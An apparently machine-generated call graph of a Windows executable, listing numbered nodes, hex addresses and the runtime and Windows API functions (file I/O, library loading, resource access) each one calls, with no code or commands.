94471 b61caa 49 API calls 93975->94471 93978 bbea54 93979 b745e0 334 API calls 93978->93979 93979->93980 93980->93727 93981 bbea84 93981->93980 93982 b6936c 81 API calls 93981->93982 93983 bbea9f 93982->93983 94472 b6bc74 48 API calls 93983->94472 93985 bbeaaf 93986 b73200 334 API calls 93985->93986 93986->93980 93987->93754 93988->93727 93990 b66f00 93989->93990 93991 b66ef8 93989->93991 93990->93724 95707 b6dd47 48 API calls _memcpy_s 93991->95707 93993->93724 93994->93726 93995->93724 93996->93724 93997->93745 93998->93740 93999->93755 94000->93782 94001->93780 94002->93782 94003->93782 94004->93793 94005->93794 94006->93794 94007->93803 94008->93799 94009->93810 94011 b69384 94010->94011 94025 b69380 94010->94025 94012 bd4cbd __i64tow 94011->94012 94013 bd4bbf 94011->94013 94014 b69398 94011->94014 94015 b693b0 __itow Mailbox _wcscpy 94011->94015 94016 bd4bc8 94013->94016 94017 bd4ca5 94013->94017 94054 b8172b 80 API calls 3 library calls 94014->94054 94020 b7f4ea 48 API calls 94015->94020 94016->94015 94021 bd4be7 94016->94021 94055 b8172b 80 API calls 3 library calls 94017->94055 94022 b693ba 94020->94022 94023 b7f4ea 48 API calls 94021->94023 94024 b6ce19 48 API calls 94022->94024 94022->94025 94026 bd4c04 94023->94026 94024->94025 94025->93825 94027 b7f4ea 48 API calls 94026->94027 94028 bd4c2a 94027->94028 94028->94025 94029 b6ce19 48 API calls 94028->94029 94029->94025 94056 b64907 94030->94056 94035 b6459b 94035->93831 94035->93832 94037 b6458d 94088 b645be SetFilePointerEx SetFilePointerEx 94037->94088 94039 b64594 94089 b64845 SetFilePointerEx SetFilePointerEx WriteFile 94039->94089 94042 b6d297 94041->94042 94043 b6d29c 94041->94043 94042->94043 94112 b81621 48 API calls 94042->94112 94043->93813 94045 b6d2d9 94045->93813 94113 b81e46 94046->94113 94049->93841 94050->93849 94051->93819 94052->93850 94053->93850 94054->94015 94055->94015 94057 b64920 94056->94057 94058 b6455b 94056->94058 94057->94058 94059 b64925 CloseHandle 94057->94059 94060 b647ff 94058->94060 94059->94058 94061 bd406e 94060->94061 94062 b64818 CreateFileW 94060->94062 94063 b64582 94061->94063 94064 bd4074 CreateFileW 94061->94064 94062->94063 94063->94035 94068 b645d5 94063->94068 94064->94063 94065 bd409a 94064->94065 94090 b646ce 94065->94090 94069 b645f5 94068->94069 94070 b646ce 2 API calls 94069->94070 94078 b646a2 94069->94078 94079 b6464e 94069->94079 94071 b6462d 94070->94071 94072 b7f4ea 48 API calls 94071->94072 94073 b64638 94072->94073 94074 b647b7 48 API calls 94073->94074 94076 b64642 94074->94076 94075 b646ce 2 API calls 94075->94078 94100 b6c2e0 94076->94100 94078->94037 94080 b646ce 2 API calls 94079->94080 94087 b64689 94079->94087 94081 bd3e0a 94080->94081 94106 b635fe 94081->94106 94084 b7f4ea 48 API calls 94085 bd3e19 94084->94085 94086 b6c2e0 2 API calls 94085->94086 94086->94087 94087->94075 94088->94039 94089->94035 94097 b646e8 94090->94097 94091 b6476d SetFilePointerEx 94098 b64798 SetFilePointerEx 94091->94098 94093 bd40d0 94099 b64798 SetFilePointerEx 94093->94099 94095 bd40ea 94096 b64743 94096->94063 94097->94091 94097->94093 94097->94096 94098->94096 94099->94095 94101 b6c354 94100->94101 94105 b6c2ee 94100->94105 94111 b645a6 SetFilePointerEx 94101->94111 94102 b6c317 94102->94079 94104 b6c327 ReadFile 94104->94102 94104->94105 94105->94102 94105->94104 94107 b646ce 2 API calls 94106->94107 94108 b6361f 94107->94108 94109 b646ce 2 API calls 94108->94109 94110 b63633 94109->94110 94110->94084 94111->94105 94112->94045 94114 b81e61 94113->94114 94117 b81e55 94113->94117 94137 b87c0e 47 API calls __getptd_noexit 94114->94137 94116 b82019 94121 b81e41 94116->94121 94138 b86e10 8 API calls __cftoe2_l 94116->94138 94117->94114 94128 b81ed4 94117->94128 94132 b89d6b 47 API calls __cftoe2_l 94117->94132 94120 b81fa0 94120->94114 94120->94121 94123 b81fb0 94120->94123 94121->93826 94122 b81f5f 94122->94114 94124 b81f7b 94122->94124 94134 b89d6b 47 API calls __cftoe2_l 94122->94134 94136 b89d6b 47 API calls __cftoe2_l 94123->94136 94124->94114 94124->94121 94127 b81f91 94124->94127 94135 b89d6b 47 API calls __cftoe2_l 94127->94135 94128->94114 94131 b81f41 94128->94131 94133 b89d6b 47 API calls __cftoe2_l 94128->94133 94131->94120 94131->94122 94132->94128 94133->94131 94134->94124 94135->94121 94136->94121 94137->94116 94138->94121 94140 b6936c 81 API calls 94139->94140 94141 bbf8ea 94140->94141 94165 bbf92c Mailbox 94141->94165 94175 bc0567 94141->94175 94143 bbfb8b 94144 bbfcfa 94143->94144 94148 bbfb95 94143->94148 94250 bc0688 89 API calls Mailbox 94144->94250 94147 bbfd07 94147->94148 94150 bbfd13 94147->94150 94188 bbf70a 94148->94188 94149 b6936c 81 API calls 94160 bbf984 Mailbox 94149->94160 94150->94165 94155 bbfbc9 94202 b7ed18 94155->94202 94158 bbfbfd 94206 b7c050 94158->94206 94159 bbfbe3 94248 bacc5c 86 API calls 4 library calls 94159->94248 94160->94143 94160->94149 94160->94165 94246 bc29e8 48 API calls _memcpy_s 94160->94246 94247 bbfda5 60 API calls 2 library calls 94160->94247 94163 bbfc14 94166 b71b90 48 API calls 94163->94166 94173 bbfc3e 94163->94173 94164 bbfbee GetCurrentProcess TerminateProcess 94164->94158 94165->93856 94167 bbfc2d 94166->94167 94168 bc040f 105 API calls 94167->94168 94168->94173 94170 bbfd65 94170->94165 94171 bbfd7e FreeLibrary 94170->94171 94171->94165 94173->94170 94217 b71b90 94173->94217 94233 bc040f 94173->94233 94249 b6dcae 50 API calls Mailbox 94173->94249 94176 b6bdfa 48 API calls 94175->94176 94177 bc0582 CharLowerBuffW 94176->94177 94251 ba1f11 94177->94251 94181 b6d7f7 48 API calls 94182 bc05bb 94181->94182 94258 b669e9 48 API calls _memcpy_s 94182->94258 94184 bc05d2 94185 b6b18b 48 API calls 94184->94185 94186 bc05de Mailbox 94185->94186 94187 bc061a Mailbox 94186->94187 94259 bbfda5 60 API calls 2 library calls 94186->94259 94187->94160 94189 bbf77a 94188->94189 94190 bbf725 94188->94190 94194 bc0828 94189->94194 94191 b7f4ea 48 API calls 94190->94191 94193 bbf747 94191->94193 94192 b7f4ea 48 API calls 94192->94193 94193->94189 94193->94192 94195 bc0a53 Mailbox 94194->94195 94201 bc084b _strcat _wcscpy __NMSG_WRITE 94194->94201 94195->94155 94196 b6cf93 58 API calls 94196->94201 94197 b6d286 48 API calls 94197->94201 94198 b6936c 81 API calls 94198->94201 94199 b8395c 47 API calls __crtLCMapStringA_stat 94199->94201 94201->94195 94201->94196 94201->94197 94201->94198 94201->94199 94262 ba8035 50 API calls __NMSG_WRITE 94201->94262 94204 b7ed2d 94202->94204 94203 b7edc5 VirtualProtect 94205 b7ed93 94203->94205 94204->94203 94204->94205 94205->94158 94205->94159 94207 b7c064 94206->94207 94209 b7c069 Mailbox 94206->94209 94263 b7c1af 48 API calls 94207->94263 94211 b7c077 94209->94211 94264 b7c15c 48 API calls 94209->94264 94212 b7f4ea 48 API calls 94211->94212 94213 b7c152 94211->94213 94214 b7c108 94212->94214 94213->94163 94215 b7f4ea 48 API calls 94214->94215 94216 b7c113 94215->94216 94216->94163 94218 b71cf6 94217->94218 94221 b71ba2 94217->94221 94218->94173 94219 b71bae 94225 b71bb9 94219->94225 94266 b7c15c 48 API calls 94219->94266 94221->94219 94222 b7f4ea 48 API calls 94221->94222 94223 bd49c4 94222->94223 94226 b7f4ea 48 API calls 94223->94226 94224 b71c5d 94224->94173 94225->94224 94227 b7f4ea 48 API calls 94225->94227 94232 bd49cf 94226->94232 94228 b71c9f 94227->94228 94229 b71cb2 94228->94229 94265 b62925 48 API calls 94228->94265 94229->94173 94231 b7f4ea 48 API calls 94231->94232 94232->94219 94232->94231 94234 bc0427 94233->94234 94239 bc0443 94233->94239 94235 bc042e 94234->94235 94236 bc044f 94234->94236 94237 bc04f8 94234->94237 94234->94239 94273 ba7c56 50 API calls _strlen 94235->94273 94243 b6cdb9 48 API calls 94236->94243 94288 ba9dc5 103 API calls 94237->94288 94238 bc051e 94238->94173 94239->94238 94267 b81c9d 94239->94267 94243->94239 94244 bc0438 94274 b6cdb9 94244->94274 94246->94160 94247->94160 94248->94164 94249->94173 94250->94147 94253 ba1f3b __NMSG_WRITE 94251->94253 94252 ba1f79 94252->94181 94252->94186 94253->94252 94254 ba1f6f 94253->94254 94256 ba1ffa 94253->94256 94254->94252 94260 b7d37a 60 API calls 94254->94260 94256->94252 94261 b7d37a 60 API calls 94256->94261 94258->94184 94259->94187 94260->94254 94261->94256 94262->94201 94263->94209 94264->94211 94265->94229 94266->94225 94268 b81ccf _free 94267->94268 94269 b81ca6 RtlFreeHeap 94267->94269 94268->94238 94269->94268 94270 b81cbb 94269->94270 94289 b87c0e 47 API calls __getptd_noexit 94270->94289 94272 b81cc1 GetLastError 94272->94268 94273->94244 94275 b6cdc5 94274->94275 94276 b6cdfb 94274->94276 94281 b7f4ea 48 API calls 94275->94281 94277 b6ce04 94276->94277 94278 b6ce0e 94276->94278 94279 b66a63 48 API calls 94277->94279 94280 b6bcce 48 API calls 94278->94280 94283 b6cdf1 94279->94283 94280->94283 94282 b6cdd8 94281->94282 94284 b6cde3 94282->94284 94285 bd4621 94282->94285 94283->94239 94284->94283 94287 b6ce19 48 API calls 94284->94287 94285->94283 94286 b6d7f7 48 API calls 94285->94286 94286->94283 94287->94283 94288->94239 94289->94272 94291 b7e547 94290->94291 94292 b7e535 94290->94292 94295 b6bcce 48 API calls 94291->94295 94293 b7e541 94292->94293 94294 b7e53b 94292->94294 94297 b7e63a 48 API calls 94293->94297 94320 b7e63a 94294->94320 94305 ba5a81 94295->94305 94300 ba5c17 94297->94300 94298 ba5ab0 94298->93892 94303 b6bf20 50 API calls 94300->94303 94304 ba5c25 94303->94304 94312 ba5c35 Mailbox 94304->94312 94341 ba5cf1 50 API calls 94304->94341 94305->94298 94339 ba5a27 SetFilePointerEx ReadFile 94305->94339 94340 b6c799 48 API calls _memcpy_s 94305->94340 94307 bd40c9 94311 b7e581 Mailbox 94311->93892 94312->93892 94313->93868 94314->93895 94315->93896 94316->93867 94317->93867 94318->93889 94319->93894 94321 b7f4ea 48 API calls 94320->94321 94322 b7e64d 94321->94322 94323 b66b4a 48 API calls 94322->94323 94324 b7e55f 94323->94324 94325 b6bf20 94324->94325 94342 b6c1c2 94325->94342 94327 b6c2e0 2 API calls 94330 b6bf31 94327->94330 94328 b6bf66 94328->94307 94331 b6c1de MultiByteToWideChar 94328->94331 94330->94327 94330->94328 94349 b6bf71 48 API calls _memcpy_s 94330->94349 94332 b6c245 94331->94332 94333 b6c201 94331->94333 94335 b6bcce 48 API calls 94332->94335 94334 b7f4ea 48 API calls 94333->94334 94336 b6c216 MultiByteToWideChar 94334->94336 94338 b6c237 94335->94338 94350 b6c24f 94336->94350 94338->94311 94339->94305 94340->94305 94341->94312 94343 bd3e49 94342->94343 94344 b6c1d3 94342->94344 94345 b66b4a 48 API calls 94343->94345 94344->94330 94346 bd3e53 94345->94346 94347 b7f4ea 48 API calls 94346->94347 94348 bd3e5f 94347->94348 94349->94330 94351 b6c2d1 94350->94351 94352 b6c25e 94350->94352 94353 b6b18b 48 API calls 94351->94353 94352->94351 94354 b6c26a 94352->94354 94361 b6c27c _memcpy_s 94353->94361 94355 b6c274 94354->94355 94356 b6c2a2 94354->94356 94362 b6c369 48 API calls 94355->94362 94358 b66b4a 48 API calls 94356->94358 94359 b6c2ac 94358->94359 94360 b7f4ea 48 API calls 94359->94360 94360->94361 94361->94338 94362->94361 94391 b66b0f 94363->94391 94365 b6b69b 94398 b6ba85 48 API calls _memcpy_s 94365->94398 94367 b6b6b5 Mailbox 94367->93905 94370 b6b495 94370->94365 94371 bd3939 _memcpy_s 94370->94371 94372 bd397b 94370->94372 94375 b6b9e4 94370->94375 94378 b6ba85 48 API calls 94370->94378 94380 b6bcce 48 API calls 94370->94380 94383 bd3909 94370->94383 94384 b6bb85 48 API calls 94370->94384 94388 b6bdfa 48 API calls 94370->94388 94396 b6c413 59 API calls 94370->94396 94397 b6bc74 48 API calls 94370->94397 94399 b6c6a5 49 API calls 94370->94399 94400 b6c799 48 API calls _memcpy_s 94370->94400 94401 ba26bc 88 API calls 4 library calls 94371->94401 94402 ba26bc 88 API calls 4 library calls 94372->94402 94404 ba26bc 88 API calls 4 library calls 94375->94404 94376 bd3973 94376->94367 94378->94370 94380->94370 94381 bd3989 94403 b6ba85 48 API calls _memcpy_s 94381->94403 94385 b66b4a 48 API calls 94383->94385 94384->94370 94387 bd3914 94385->94387 94390 b7f4ea 48 API calls 94387->94390 94389 b6b66c CharUpperBuffW 94388->94389 94389->94370 94390->94371 94392 b7f4ea 48 API calls 94391->94392 94393 b66b34 94392->94393 94394 b66b4a 48 API calls 94393->94394 94395 b66b43 94394->94395 94395->94370 94396->94370 94397->94370 94398->94367 94399->94370 94400->94370 94401->94376 94402->94381 94403->94376 94404->94376 94406 b6d654 94405->94406 94414 b6d67e 94405->94414 94407 b6d65b 94406->94407 94410 b6d6c2 94406->94410 94408 b6d6ab 94407->94408 94409 b6d666 94407->94409 94408->94414 94420 b7dce0 53 API calls 94408->94420 94419 b6d9a0 53 API calls __cinit 94409->94419 94410->94408 94421 b7dce0 53 API calls 94410->94421 94414->93938 94415->93938 94416->93919 94417->93919 94418->93920 94419->94414 94420->94414 94421->94408 94422->93980 94423->93952 94424->93959 94426 b74637 94425->94426 94427 b7479f 94425->94427 94428 b74643 94426->94428 94429 bd6e05 94426->94429 94430 b6ce19 48 API calls 94427->94430 94523 b74300 335 API calls _memcpy_s 94428->94523 94432 bbe822 335 API calls 94429->94432 94437 b746e4 Mailbox 94430->94437 94434 bd6e11 94432->94434 94433 b74739 Mailbox 94433->93980 94434->94433 94524 bacc5c 86 API calls 4 library calls 94434->94524 94436 b74659 94436->94433 94436->94434 94436->94437 94440 bb6ff0 335 API calls 94437->94440 94473 bafa0c 94437->94473 94514 b64252 94437->94514 94520 ba6524 94437->94520 94440->94433 94442->93964 94443->93968 95501 b6bd30 94444->95501 94446 b73267 94458 b73313 _memcpy_s Mailbox 94446->94458 95574 b7c36b 86 API calls 94446->95574 94448 b7c3c3 48 API calls 94448->94458 94451 b6d645 53 API calls 94451->94458 94457 b6fe30 335 API calls 94457->94458 94458->94448 94458->94451 94458->94457 94460 bacc5c 86 API calls 94458->94460 94461 b6dcae 50 API calls 94458->94461 94465 b7c2d6 48 API calls 94458->94465 94466 b66eed 48 API calls 94458->94466 94468 b7f4ea 48 API calls 94458->94468 94469 b73635 Mailbox 94458->94469 95506 b62b7a 94458->95506 95513 b6e8d0 94458->95513 95575 b6d9a0 53 API calls __cinit 94458->95575 95576 b6d8c0 53 API calls 94458->95576 95577 bbf320 335 API calls 94458->95577 95578 bbf5ee 335 API calls 94458->95578 95579 b61caa 49 API calls 94458->95579 95580 bbcda2 82 API calls Mailbox 94458->95580 95581 ba80e3 53 API calls 94458->95581 95582 b6d764 55 API calls 94458->95582 95583 b6d6e9 94458->95583 95587 bac942 50 API calls 94458->95587 94460->94458 94461->94458 94465->94458 94466->94458 94468->94458 94469->93980 94470->93978 94471->93981 94472->93985 94474 bafa1c __ftell_nolock 94473->94474 94475 bafa44 94474->94475 94476 b6d286 48 API calls 94474->94476 94477 b6936c 81 API calls 94475->94477 94476->94475 94478 bafa5e 94477->94478 94479 bafb68 94478->94479 94480 bafa80 94478->94480 94489 bafb92 94478->94489 94525 b641a9 94479->94525 94482 b6936c 81 API calls 94480->94482 94487 bafa8c _wcscpy _wcschr 94482->94487 94484 bafb8e 94486 b6936c 81 API calls 94484->94486 94484->94489 94485 b641a9 136 API calls 94485->94484 94488 bafbc7 94486->94488 94493 bafab0 _wcscat _wcscpy 94487->94493 94497 bafade _wcscat 94487->94497 94490 b81dfc __wsplitpath 47 API calls 94488->94490 94489->94433 94498 bafbeb _wcscat _wcscpy 94490->94498 94491 b6936c 81 API calls 94492 bafafc _wcscpy 94491->94492 94610 ba72cb GetFileAttributesW 94492->94610 94495 b6936c 81 API calls 94493->94495 94495->94497 94496 bafb1c __NMSG_WRITE 94496->94489 94499 b6936c 81 API calls 94496->94499 94497->94491 94502 b6936c 81 API calls 94498->94502 94500 bafb48 94499->94500 94611 ba60dd 77 API calls 4 library calls 94500->94611 94504 bafc82 94502->94504 94503 bafb5c 94503->94489 94549 ba690b 94504->94549 94506 bafca2 94507 ba6524 3 API calls 94506->94507 94508 bafcb1 94507->94508 94509 b6936c 81 API calls 94508->94509 94512 bafce2 94508->94512 94510 bafccb 94509->94510 94555 babfa4 94510->94555 94513 b64252 84 API calls 94512->94513 94513->94489 94515 b6425c 94514->94515 94517 b64263 94514->94517 94516 b835e4 __fcloseall 83 API calls 94515->94516 94516->94517 94518 b64272 94517->94518 94519 b64283 FreeLibrary 94517->94519 94518->94433 94519->94518 95497 ba6ca9 GetFileAttributesW 94520->95497 94523->94436 94524->94433 94612 b64214 94525->94612 94530 b641d4 LoadLibraryExW 94622 b64291 94530->94622 94531 bd4f73 94533 b64252 84 API calls 94531->94533 94534 bd4f7a 94533->94534 94536 b64291 3 API calls 94534->94536 94538 bd4f82 94536->94538 94648 b644ed 94538->94648 94539 b641fb 94539->94538 94540 b64207 94539->94540 94542 b64252 84 API calls 94540->94542 94544 b6420c 94542->94544 94544->94484 94544->94485 94546 bd4fa9 94654 b64950 94546->94654 94550 ba6918 _wcschr __ftell_nolock 94549->94550 94551 b81dfc __wsplitpath 47 API calls 94550->94551 94554 ba692e _wcscat _wcscpy 94550->94554 94552 ba695d 94551->94552 94553 b81dfc __wsplitpath 47 API calls 94552->94553 94553->94554 94554->94506 94556 babfb1 __ftell_nolock 94555->94556 94557 b7f4ea 48 API calls 94556->94557 94558 bac00e 94557->94558 94559 b647b7 48 API calls 94558->94559 94560 bac018 94559->94560 95121 babdb4 94560->95121 94562 bac023 94563 b64517 83 API calls 94562->94563 94564 bac036 _wcscmp 94563->94564 94565 bac05a 94564->94565 94566 bac107 94564->94566 95154 bac56d 94 API calls 2 library calls 94565->95154 95155 bac56d 94 API calls 2 library calls 94566->95155 94569 bac05f 94570 b81dfc __wsplitpath 47 API calls 94569->94570 94573 bac110 94569->94573 94575 bac088 _wcscat _wcscpy 94570->94575 94571 b644ed 64 API calls 94572 bac12c 94571->94572 94574 b644ed 64 API calls 94572->94574 94573->94512 94576 bac13c 94574->94576 94578 b81dfc __wsplitpath 47 API calls 94575->94578 94577 b644ed 64 API calls 94576->94577 94579 bac157 94577->94579 94583 bac0d3 _wcscat 94578->94583 94580 b644ed 64 API calls 94579->94580 94581 bac167 94580->94581 94582 b644ed 64 API calls 94581->94582 94584 bac182 94582->94584 94583->94571 94583->94573 94585 b644ed 64 API calls 94584->94585 94586 bac192 94585->94586 94587 b644ed 64 API calls 94586->94587 94588 bac1a2 94587->94588 94589 b644ed 64 API calls 94588->94589 94590 bac1b2 94589->94590 95124 bac71a GetTempPathW GetTempFileNameW 94590->95124 94592 bac1be 94610->94496 94611->94503 94659 b64339 94612->94659 94616 b64244 FreeLibrary 94617 b641bb 94616->94617 94619 b83499 94617->94619 94618 b6423c 94618->94616 94618->94617 94667 b834ae 94619->94667 94621 b641c8 94621->94530 94621->94531 94864 b642e4 94622->94864 94625 b642b8 94627 b642c1 FreeLibrary 94625->94627 94628 b641ec 94625->94628 94627->94628 94629 b64380 94628->94629 94630 b7f4ea 48 API calls 94629->94630 94631 b64395 94630->94631 94632 b647b7 48 API calls 94631->94632 94633 b643a1 _memcpy_s 94632->94633 94634 b643dc 94633->94634 94636 b644d1 94633->94636 94637 b64499 94633->94637 94635 b64950 57 API calls 94634->94635 94645 b643e5 94635->94645 94883 bac750 93 API calls 94636->94883 94872 b6406b CreateStreamOnHGlobal 94637->94872 94640 b644ed 64 API calls 94640->94645 94642 b64479 94642->94539 94643 bd4ed7 94644 b64517 83 API calls 94643->94644 94646 bd4eeb 94644->94646 94645->94640 94645->94642 94645->94643 94878 b64517 94645->94878 94647 b644ed 64 API calls 94646->94647 94647->94642 94649 b644ff 94648->94649 94650 bd4fc0 94648->94650 94907 b8381e 94649->94907 94653 babf5a GetSystemTimeAsFileTime 94653->94546 94655 b6495f 94654->94655 94656 bd5002 94654->94656 95103 b83e65 94655->95103 94658 b64967 94663 b6434b 94659->94663 94662 b64321 LoadLibraryA GetProcAddress 94662->94618 94664 b6422f 94663->94664 94665 b64354 LoadLibraryA 94663->94665 94664->94618 94664->94662 94665->94664 94666 b64365 GetProcAddress 94665->94666 94666->94664 94670 b834ba __lseeki64 94667->94670 94668 b834cd 94715 b87c0e 47 API calls __getptd_noexit 94668->94715 94670->94668 94672 b834fe 94670->94672 94671 b834d2 94716 b86e10 8 API calls __cftoe2_l 94671->94716 94686 b8e4c8 94672->94686 94675 b83503 94676 b83519 94675->94676 94677 b8350c 94675->94677 94679 b83543 94676->94679 94680 b83523 94676->94680 94717 b87c0e 47 API calls __getptd_noexit 94677->94717 94700 b8e5e0 94679->94700 94718 b87c0e 47 API calls __getptd_noexit 94680->94718 94682 b834dd __lseeki64 @_EH4_CallFilterFunc@8 94682->94621 94687 b8e4d4 __lseeki64 94686->94687 94720 b87cf4 94687->94720 94689 b8e4e2 94690 b8e559 94689->94690 94698 b8e552 94689->94698 94730 b87d7c 94689->94730 94753 b84e5b 48 API calls __lock 94689->94753 94754 b84ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94689->94754 94755 b869d0 94690->94755 94694 b8e5cc __lseeki64 94694->94675 94695 b8e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94695->94698 94727 b8e5d7 94698->94727 94709 b8e600 __wopenfile 94700->94709 94701 b8e61a 94771 b87c0e 47 API calls __getptd_noexit 94701->94771 94702 b8e7d5 94702->94701 94706 b8e838 94702->94706 94704 b8e61f 94772 b86e10 8 API calls __cftoe2_l 94704->94772 94768 b963c9 94706->94768 94707 b8354e 94719 b83570 LeaveCriticalSection LeaveCriticalSection _fprintf 94707->94719 94709->94701 94709->94702 94773 b8185b 59 API calls 2 library calls 94709->94773 94711 b8e7ce 94711->94702 94774 b8185b 59 API calls 2 library calls 94711->94774 94713 b8e7ed 94713->94702 94775 b8185b 59 API calls 2 library calls 94713->94775 94715->94671 94716->94682 94717->94682 94718->94682 94719->94682 94721 b87d18 EnterCriticalSection 94720->94721 94722 b87d05 94720->94722 94721->94689 94723 b87d7c __mtinitlocknum 46 API calls 94722->94723 94724 b87d0b 94723->94724 94724->94721 94761 b8115b 47 API calls 3 library calls 94724->94761 94762 b87e58 LeaveCriticalSection 94727->94762 94729 b8e5de 94729->94694 94731 b87d88 __lseeki64 94730->94731 94732 b87d91 94731->94732 94734 b87da9 94731->94734 94763 b881c2 47 API calls __NMSG_WRITE 94732->94763 94736 b869d0 __malloc_crt 46 API calls 94734->94736 94740 b87dc9 __lseeki64 94734->94740 94735 b87d96 94764 b8821f 47 API calls 6 library calls 94735->94764 94738 b87dbd 94736->94738 94741 b87dd3 94738->94741 94742 b87dc4 94738->94742 94739 b87d9d 94765 b81145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94739->94765 94740->94689 94745 b87cf4 __lock 46 API calls 94741->94745 94766 b87c0e 47 API calls __getptd_noexit 94742->94766 94747 b87dda 94745->94747 94748 b87de9 InitializeCriticalSectionAndSpinCount 94747->94748 94749 b87dfe 94747->94749 94750 b87e04 94748->94750 94751 b81c9d _free 46 API calls 94749->94751 94767 b87e1a LeaveCriticalSection _doexit 94750->94767 94751->94750 94753->94689 94754->94689 94757 b869de 94755->94757 94756 b8395c __crtLCMapStringA_stat 46 API calls 94756->94757 94757->94756 94758 b86a12 94757->94758 94759 b869f1 Sleep 94757->94759 94758->94695 94758->94698 94760 b86a0a 94759->94760 94760->94757 94760->94758 94762->94729 94763->94735 94764->94739 94766->94740 94767->94740 94776 b95bb1 94768->94776 94770 b963e2 94770->94707 94771->94704 94772->94707 94773->94711 94774->94713 94775->94702 94777 b95bbd __lseeki64 94776->94777 94778 b95bcf 94777->94778 94781 b95c06 94777->94781 94861 b87c0e 47 API calls __getptd_noexit 94778->94861 94780 b95bd4 94862 b86e10 8 API calls __cftoe2_l 94780->94862 94787 b95c78 94781->94787 94784 b95c23 94863 b95c4c LeaveCriticalSection __unlock_fhandle 94784->94863 94786 b95bde __lseeki64 94786->94770 94788 b95c98 94787->94788 94789 b8273b __wsopen_helper 47 API calls 94788->94789 94792 b95cb4 94789->94792 94790 b86e20 __invoke_watson 8 API calls 94791 b963c8 94790->94791 94794 b95bb1 __wsopen_helper 104 API calls 94791->94794 94793 b95cee 94792->94793 94798 b95d11 94792->94798 94810 b95deb 94792->94810 94795 b87bda __chsize_nolock 47 API calls 94793->94795 94796 b963e2 94794->94796 94797 b95cf3 94795->94797 94796->94784 94799 b87c0e __cftoe2_l 47 API calls 94797->94799 94801 b95dcf 94798->94801 94809 b95dad 94798->94809 94800 b95d00 94799->94800 94802 b86e10 __cftoe2_l 8 API calls 94800->94802 94803 b87bda __chsize_nolock 47 API calls 94801->94803 94805 b95d0a 94802->94805 94804 b95dd4 94803->94804 94806 b87c0e __cftoe2_l 47 API calls 94804->94806 94805->94784 94807 b95de1 94806->94807 94808 b86e10 __cftoe2_l 8 API calls 94807->94808 94808->94810 94811 b8a979 __wsopen_helper 52 API calls 94809->94811 94810->94790 94812 b95e7b 94811->94812 94813 b95e85 94812->94813 94814 b95ea6 94812->94814 94815 b87bda __chsize_nolock 47 API calls 94813->94815 94816 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94814->94816 94817 b95e8a 94815->94817 94827 b95ec8 94816->94827 94818 b87c0e __cftoe2_l 47 API calls 94817->94818 94820 b95e94 94818->94820 94819 b95f46 GetFileType 94821 b95f51 GetLastError 94819->94821 94822 b95f93 94819->94822 94825 b87c0e __cftoe2_l 47 API calls 94820->94825 94826 b87bed __dosmaperr 47 API calls 94821->94826 94831 b8ac0b __set_osfhnd 48 API calls 94822->94831 94823 b95f14 GetLastError 94824 b87bed __dosmaperr 47 API calls 94823->94824 94828 b95f39 94824->94828 94825->94805 94829 b95f78 CloseHandle 94826->94829 94827->94819 94827->94823 94830 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94827->94830 94834 b87c0e __cftoe2_l 47 API calls 94828->94834 94829->94828 94832 b95f86 94829->94832 94833 b95f09 94830->94833 94838 b95fb1 94831->94838 94835 b87c0e __cftoe2_l 47 API calls 94832->94835 94833->94819 94833->94823 94834->94810 94836 b95f8b 94835->94836 94836->94828 94837 b9616c 94837->94810 94840 b9633f CloseHandle 94837->94840 94838->94837 94839 b8f82f __lseeki64_nolock 49 API calls 94838->94839 94855 b96032 94838->94855 94841 b9601b 94839->94841 94842 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94840->94842 94844 b87bda __chsize_nolock 47 API calls 94841->94844 94841->94855 94843 b96366 94842->94843 94845 b9636e GetLastError 94843->94845 94846 b9639a 94843->94846 94844->94855 94847 b87bed __dosmaperr 47 API calls 94845->94847 94846->94810 94850 b9637a 94847->94850 94848 b96064 94853 b96f40 __chsize_nolock 81 API calls 94848->94853 94848->94855 94849 b8f82f 49 API calls __lseeki64_nolock 94849->94855 94854 b8ab1e __free_osfhnd 48 API calls 94850->94854 94851 b8ee0e 59 API calls __filbuf 94851->94855 94852 b8ea9c __close_nolock 50 API calls 94852->94855 94853->94848 94854->94846 94855->94837 94855->94848 94855->94849 94855->94851 94855->94852 94856 b8af61 __flush 78 API calls 94855->94856 94857 b961e9 94855->94857 94856->94855 94858 b8ea9c __close_nolock 50 API calls 94857->94858 94859 b961f0 94858->94859 94860 b87c0e __cftoe2_l 47 API calls 94859->94860 94860->94810 94861->94780 94862->94786 94863->94786 94868 b642f6 94864->94868 94867 b642cc LoadLibraryA GetProcAddress 94867->94625 94869 b642aa 94868->94869 94870 b642ff LoadLibraryA 94868->94870 94869->94625 94869->94867 94870->94869 94871 b64310 GetProcAddress 94870->94871 94871->94869 94873 b64085 FindResourceExW 94872->94873 94877 b640a2 94872->94877 94874 bd4f16 LoadResource 94873->94874 94873->94877 94875 bd4f2b SizeofResource 94874->94875 94874->94877 94876 bd4f3f LockResource 94875->94876 94875->94877 94876->94877 94877->94634 94879 b64526 94878->94879 94882 bd4fe0 94878->94882 94884 b83a8d 94879->94884 94881 b64534 94881->94645 94883->94634 94885 b83a99 __lseeki64 94884->94885 94886 b83aa7 94885->94886 94887 b83acd 94885->94887 94897 b87c0e 47 API calls __getptd_noexit 94886->94897 94899 b84e1c 94887->94899 94890 b83aac 94898 b86e10 8 API calls __cftoe2_l 94890->94898 94894 b83ae2 94906 b83b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94894->94906 94896 b83ab7 __lseeki64 94896->94881 94897->94890 94898->94896 94900 b84e2c 94899->94900 94901 b84e4e EnterCriticalSection 94899->94901 94900->94901 94903 b84e34 94900->94903 94902 b83ad3 94901->94902 94905 b839fe 81 API calls 4 library calls 94902->94905 94904 b87cf4 __lock 47 API calls 94903->94904 94904->94902 94905->94894 94906->94896 94910 b83839 94907->94910 94909 b64510 94909->94653 94911 b83845 __lseeki64 94910->94911 94912 b83888 94911->94912 94913 b83880 __lseeki64 94911->94913 94915 b8385b _memset 94911->94915 94914 b84e1c __lock_file 48 API calls 94912->94914 94913->94909 94917 b8388e 94914->94917 94937 b87c0e 47 API calls __getptd_noexit 94915->94937 94923 b8365b 94917->94923 94918 b83875 94938 b86e10 8 API calls __cftoe2_l 94918->94938 94926 b83676 _memset 94923->94926 94929 b83691 